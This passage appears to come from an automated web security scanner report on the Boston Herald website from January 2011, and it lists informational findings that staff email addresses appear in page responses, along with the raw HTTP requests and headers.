Cookie: bhfont=12; OAX=rcHW801DO8kADVvc; bhpopup=on; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.2.10.1296251844; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __utmb=1.1.10.1296251844; __qca=P0-1247593866-1296251843767

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<a href="mailto:hchabot@bostonherald.com">
...[SNIP]...
<div id="articleTagline" style="display:block">-&mdash; hchabot@bostonherald.com</div>
...[SNIP]...

21.54. http://www.bostonherald.com/news/regional/gardner_heist/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/gardner_heist/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /news/regional/gardner_heist/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:40:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 68225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<a href="mailto:gardnertheft@bostonherald.com">gardnertheft@bostonherald.com</a>
...[SNIP]...
<a href="mailto:theft@gardnermuseum.org">
...[SNIP]...

21.55. http://www.bostonherald.com/news/regional/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view.bg

Issue detail

The following email address was disclosed in the response:

Request

GET /news/regional/view.bg?articleid=1312552&srvc=next_article HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:39:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 47814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="articleTagline" style="display:none">-cmcconville@bostonherald.com</div>
...[SNIP]...

21.56. http://www.bostonherald.com/news/regional/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view.bg

Issue detail

The following email address was disclosed in the response:

Request

GET /news/regional/view.bg?articleid=1312541&srvc=home&position=active HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:37:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 47033

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<a href="mailto:dwedge@bostonherald.com">
...[SNIP]...
<div id="articleTagline" style="display:block">dwedge@bostonherald.com</div>
...[SNIP]...

21.57. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

Request

GET /news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 95964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="articleTagline" style="display:none">-cmcconville@bostonherald.com</div>
...[SNIP]...

21.58. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view/20110128another_winter_wallop_batters_boston/srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

Request

GET /news/regional/view/20110128another_winter_wallop_batters_boston/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 47814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="articleTagline" style="display:none">-cmcconville@bostonherald.com</div>
...[SNIP]...

21.59. http://www.bostonherald.com/news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/srvc=home&position=also

Issue detail

The following email addresses were disclosed in the response:

Request

GET /news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:36:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<a href="mailto:lsweet@bostonherald.com">
...[SNIP]...
<div id="articleTagline" style="display:block">-lsweet@bostonherald.com</div>
...[SNIP]...

21.60. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4

Issue detail

The following email address was disclosed in the response:

Request

GET /news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 95413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<a href="mailto:dwedge@bostonherald.com">
...[SNIP]...
<div id="articleTagline" style="display:block">dwedge@bostonherald.com</div>
...[SNIP]...

21.61. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4

Issue detail

The following email address was disclosed in the response:

Request

GET /news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=rcHW801DO8kADVvc; bhpopup=on; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.5.10.1296251844; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __utmb=1.2.10.1296251844; ebNewBandWidth_.www.bostonherald.com=1856%3A1296251858097

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<a href="mailto:dwedge@bostonherald.com">
...[SNIP]...
<div id="articleTagline" style="display:block">dwedge@bostonherald.com</div>
...[SNIP]...

21.62. http://www.bostonherald.com/projects/boston_pensions/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/boston_pensions/

Issue detail

The following email address was disclosed in the response:

Request

GET /projects/boston_pensions/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 42385

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   
<!-- // special_projects/ge
...[SNIP]...
<a href="mailto:newstips@bostonherald.com"><font color="#cc6600">newstips@bostonherald.com</a>
...[SNIP]...

21.63. http://www.bostonherald.com/projects/bra/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/bra/

Issue detail

The following email address was disclosed in the response:

Request

GET /projects/bra/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 68209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   
<!-- // special_projects/ge
...[SNIP]...
<a href="mailto:newstips@bostonherald.com"><font color="#cc6600">newstips@bostonherald.com</a>
...[SNIP]...

21.64. http://www.bostonherald.com/projects/buybacks/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/buybacks/

Issue detail

The following email address was disclosed in the response:

Request

GET /projects/buybacks/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
   <!-- // special_projects/payro
...[SNIP]...
<a href="mailto:joed@bostonherald.com"><font color="#cc6600">joed@bostonherald.com</a>
...[SNIP]...

21.65. http://www.bostonherald.com/projects/consultants/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/consultants/

Issue detail

The following email address was disclosed in the response:

Request

GET /projects/consultants/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:04:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 22660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Mass Pike Consultant Datab
...[SNIP]...
<a href="mailto:joed@bostonherald.com"><font color="#cc6600">joed@bostonherald.com</a>
...[SNIP]...

